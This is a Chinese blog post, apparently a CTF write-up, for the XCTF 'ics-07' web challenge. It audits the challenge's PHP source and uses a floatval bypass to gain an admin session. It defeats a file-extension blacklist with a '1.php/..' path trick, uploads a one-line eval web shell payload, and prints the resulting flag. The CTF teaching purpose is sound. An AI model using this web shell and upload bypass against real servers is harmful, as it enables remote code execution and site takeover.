【愚公系列】2023年06月 攻防世界-Web(ics-07)

最新推荐文章于 2024-04-15 10:47:16 发布
最新推荐文章于 2024-04-15 10:47:16 发布
阅读量4.3k 收藏 9
点赞数 3
分类专栏: # CTF-攻防世界-WEB 文章标签: 前端 php 开发语言 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aa2528877987/article/details/131222073
版权
文章详细阐述了PHP中的弱类型语言特性,以及floatval和preg_match函数可能导致的安全问题。通过分析ics-07题目的代码,揭示了如何利用floatval函数的特性绕过限制,以及正则表达式注入的潜在风险。接着,文章介绍了如何构造payload上传木马,并通过蚁剑连接获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

前言

php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。

floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。

例如:

$num = "3.14";
$float_num = floatval($num);
echo $float_num;

输出结果为:

3.14

在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。

preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。但是,如果使用不当,可以导致安全漏洞,如正则表达式注入漏洞。

例如,下面的代码使用preg_match函数来验证用户输入的邮件地址是否合法:

$email = $_POST['email'];
if (preg_match('/^[a-zA-Z0-9._-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/', $email)) {
  // 邮件地址合法
} else {
  // 邮件地址不合法
}

但是,如果攻击者使用恶意输入构造一个正则表达式注入攻击,可能会导致代码执行漏洞,例如:

$email = 'a+aaaaa@aaa.com';
$pattern = '/^[a-zA-Z0-9._-]+@[a-zA-Z0-9.-]+\.' . $_POST['tld'] . '{2,}$/';
if (preg_match($pattern, $email)) {
  // 邮件地址合法
} else {
  // 邮件地址不合法
}

在这个例子中,攻击者可以通过$_POST[‘tld’]参数注入恶意的正则表达式,使得正则表达式变成非法的,导致preg_match函数执行失败,从而达到攻击的目的。

因此,在使用php中的弱类型特性、函数和正则表达式等功能时,需要谨慎考虑输入的安全性、边界情况和异常情况。

一、ics-07

1.题目

在这里插入图片描述

2.答题

2.1 代码解析:发现漏洞

访问页面

在这里插入图片描述
熟悉的界面,熟悉的味道,ics系列,进入项目管理

在这里插入图片描述

这里有一个view-source.php访问看看

在这里插入图片描述
是一堆代码。我们进行尝试审计

<?php
session_start();

if (!isset($_GET[page])) {
  show_source(__FILE__);
  die();
}

if (isset($_GET[page]) && $_GET[page] != 'index.php') {
  include('flag.php');
}else {
  header('Location: ?page=flag.php');
}

如果传入的参数page的值不是index.php,则包含flag.php,否则重定向到?page=flag.php。

<?php
if ($_SESSION['admin']) {
  $con = $_POST['con'];
  $file = $_POST['file'];
  $filename = "backup/".$file;

  if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
     die("Bad file extension");
  }else{
       chdir('uploaded');
      $f = fopen($filename, 'w');
      fwrite($f, $con);
      fclose($f);
  }
}
?>

$_SESSION[\'admin\'] = True的情况下,POST提交con和file两个参数,对$filename进行正则判断,如果判断正确文件会被上传到uploaded/backup目录下。正则匹配这里把一些后缀加入了黑名单

<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
  include 'config.php';
  $id = mysql_real_escape_string($_GET[id]);
  $sql="select * from cetc007.user where id='$id'";
  $result = mysql_query($sql);
  $result = mysql_fetch_object($result);
} else {
  $result = False;
  die();
}

if(!$result)die("<br >something wae wrong ! <br>");
if($result){
  echo "id: ".$result->id."</br>";
  echo "name:".$result->user."</br>";
  $_SESSION['admin'] = True;
}
?>

这一段可以使$_SESSION[\'admin\'] = True;我们来看一下怎么构造。他需要获取一个id参数, 并且id不为1,且最后一位等于9。

这里用到了floatval这个函数,floatval 函数用于获取变量的浮点值,但是floatval在遇到字符时会截断后面的部分,比如-,+,空格等,所以可以构造id=1xx9来满足第一个if条件,if条件满足可以使得$result变量为TRUE。成功使$_SESSION[\'admin\'] = True;

?page=flag.php&id=1xx9

在这里插入图片描述

2.2 构造 payload:上传木马

下面考虑如何上传木马文件。这里利用Linux的一个目录结构特性。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/…进入的是1.php文件夹

payloa如下

con=<?php @eval($_POST[cmd]);?>&file=test.php/1.php/..

在这里插入图片描述

注意这里page参数的值不能为flag.php,否则是上传不成功的。

访问/uploaded/backup/目录,发现上传成功。
在这里插入图片描述

2.3 蚁剑连接

在这里插入图片描述

得到flag:cyberpeace{26a1fb4a7521cf94ceece6f3a30935a4}

愚公系列202306月 网络安全高级班 025.HW护网行动攻防演练介绍和工具
时光隧道
05-12 1万+
HW护网行动攻防演练是一种针对网络安全的实践活动,用于测试和提高组织的网络安全防御和攻击能力。通过模拟真实的网络攻击和防御行动,演练参与者在紧张压力下的反应和解决问题的能力,发现网络安全漏洞和提高安全意识,加强网络安全防御能力。攻防演练的成员组成一般包括攻击者、防御者和观察者三个角色。攻击者的任务是模拟真实的黑客攻击,找出系统的漏洞并利用其进行攻击,以检验系统的安全性。防御者则负责发现和修补漏洞,并保护系统不受攻击。观察者则负责记录和分析整个攻防过程,并提供建议和改进意见。
愚公系列202306月 网络安全高级班 023.ARP协议攻防实战
时光隧道
05-10 8367
ARP协议是用于将一个IP地址映射到一个MAC地址的协议,它在局域网中常被用来寻找另一个节点的MAC地址。攻击者可以利用ARP欺骗攻击来欺骗网络中的设备,使得设备将通信发送到攻击者的计算机,从而进行中间人攻击等恶意行为。因此,可以通过合理的网络配置、使用ARP防火墙以及加密通信等措施来减少ARP攻击的风险。我们经常听到的这些术语,包括"网络扫描"、“内网渗透”、“中间人拦截”、“局域网流控”、“流量欺 骗”,基本都跟ARP脱不了干系。
攻防世界xctf writeup ics-07
qq_43370221的博客
04-20 783
文章目录xctf_writeup_ics-07审计代码审计写入文件代码构造最后的payload菜刀连接的到webshell xctf_writeup_ics-07 审计代码 浏览页面 发现了view-source链接 ,接下来审计代码 if (!isset($_GET[page])) { show_source(__FILE__); die(); }...
攻防世界----ics-07
qq_44418229的博客
07-26 530
攻防世界---ics-07 分析源码+正则
攻防世界 ics-07
CyhDl666的博客
02-24 542
ics-07 hint:工控云管理系统项目管理页面解析漏洞 进入管理页面是个登录窗 左下角有个查看源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'.
攻防世界ics-07
最新发布
wangzhemvp的博客
04-15 689
session 的工作机制是:为每个访客创建一个唯一的 id (UID),并基于这个 UID 来存储变量。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/..进入的是1.php文件夹。匹配 ".php"、".php3"、".php4"、".php5"、".php7"、".phpt" 或 ".phtml" 结尾的文件名。(1)if ($_SESSION['admin']):判断 session 中的 admin 是否有值。一个点调用最后面的文件,两个点调用第一个文件。
攻防世界:XCTF:ics-07
末初 · mochu7
03-13 601
点击view-source,源码如下: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_st...
攻防世界ics-07 wp
freerats的博客
06-14 380
打开容器,看到view-source,点进去可以看到源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else { he
愚公系列】202403月 《CTF实战:从入门到提升》 003-Web安全基础知识(HTTP安全
热门推荐
时光隧道
02-26 8万+
HTTP安全是指在使用HTTP协议进行通信时,采取的一系列措施和技术,以确保传输过程中的数据的机密性、完整性和可信性。HTTP协议本身是一种明文的协议,数据在传输过程中容易被窃听、篡改或伪造。措施描述HTTPS在HTTP协议基础上增加了SSL/TLS加密层,通过对通信内容进行加密以保护数据的机密性。加密使用对称加密或非对称加密算法对敏感数据如用户登录信息或支付信息进行加密,防止数据被窃听。认证通过身份验证技术验证通信双方的身份,确保通信的可信性。
愚公系列202306月 网络安全高级班 020.Telnet协议攻防实战
时光隧道
05-10 8112
Telnet协议是一种远程登录协议,它可以让用户通过网络连接到一台远程计算机并执行命令。由于Telnet协议是明文传输的,所以在网络中进行Telnet连接存在被窃听的风险。此外,Telnet也存在安全漏洞,黑客可以通过利用这些漏洞入侵目标计算机,甚至完全控制目标系统。因此,在现代网络中,Telnet已经被SSH所取代,SSH使用加密技术保证安全性。Telnet 服务是一种远程登录服务,用于方便管理 员对目标服务器/设备进行远程管理。
愚公系列】202403月 《CTF实战:从入门到提升》 004-Web安全基础知识(基础工具使用)
时光隧道
02-26 8万+
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决一系列网络安全相关的问题,获取旗帜并积分。CTFWeb安全基础工具则是在CTF中用于进行Web安全攻防的工具。作用和意义描述简化攻防过程CTFWeb安全基础工具提供了各种自动化和半自动化的工具,可以帮助参赛者快速进行渗透测试、漏洞挖掘和攻击。这些工具可以简化繁琐的攻击过程,提高效率。快速发现漏洞CTFWeb安全基础工具集成了各种漏洞扫描和渗透测试工具,可以帮助参赛者快速发现Web应用程序中的漏洞。
攻防世界 ics-07
qq_43622442的博客
03-05 1572
攻防世界 ics-07 题 写在txt里当笔记太不方便了= =以后还是写这儿吧 1.打开首页是这样子 2.看那个提示,一开始我还以为是直接view-source,没想到那个是个超链接= =点它,出现源码 3.审计一下,利用点在这儿: 4.但是session我们无法自己伪造,看下面的代码: 5.看到sql就想注入= =但是这里宽字节并不行。看一下这句,只要result有值我们就可以上传文件了...
攻防世界CTF | WP】ics-07
ethan18的博客
02-01 2320
攻防世界CTF | WP】ics-07题目思路查看界面 题目 思路 查看界面 打开题目,我们可以看到一个只有项目管理界面可以进行操作的网站,项目管理界面如下 我们看到有一个源代码链接,点击链接的源代码如下 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) &&
[xctf]ics-07攻防世界(代码审计 + 正则 + 文件上传)
qq_37301470的博客
11-20 531
Ics -07 攻防世界 代码审计 + 正则 + 文件上传 + 登录session 源代码已经给出 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start(); if (!iss
攻防世界WEB】难度五星15分进阶题:ics-07
07-24 670
攻防世界WEB】五星15分
Web安全攻防世界09 ics-07(XCTF)
weixin_42789937的博客
01-29 1351
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
攻防世界-ics-07
m0_47571887的博客
11-21 2196
之前遇到过类似的题,考的sql注入,不过这个考的文件上传 打开题目,还是一个工控系统,继续按流程走,瞎点看看哪个能点开,最后只有项目管理才能点开. 看到有个view-source,点进去看一看,有三段代码,我们来分析分析。 提交page参数,不能包含index.php,只能包含flag.php 提交con和file参数,更改backup路径为uploaded,if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i',$filename))还对这些字符进行了..
攻防世界web进阶区ics-07
gongjingege的博客
08-14 471
题目描述:工控云管理系统项目管理页面解析漏洞 打开靶机 根据题目描述,点击项目管理 点击view-source可以查看源码 大概有三部分 1, <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') {
攻防世界-web-ics-07
mlws1900的博客
08-23 1150
判断session是不是admin,然后获取到一些值(应该就是我们post传上去的),如果匹配到php3457,pht,phtml这种特殊的后缀名,那么就结束。第三段代码是对get参数id进行校验,如果id的浮点数不是1,且最后一位是9那么实行查询语句,如果查询正确,会得到一个admin的session。get通过page传参,不能是index.php,否则包含flag.php,直接重定向到flag.php(就是界面没变)上传成功后,会切换到uploaded目录,创建文件,并将con的内容写入,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愚公搬代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值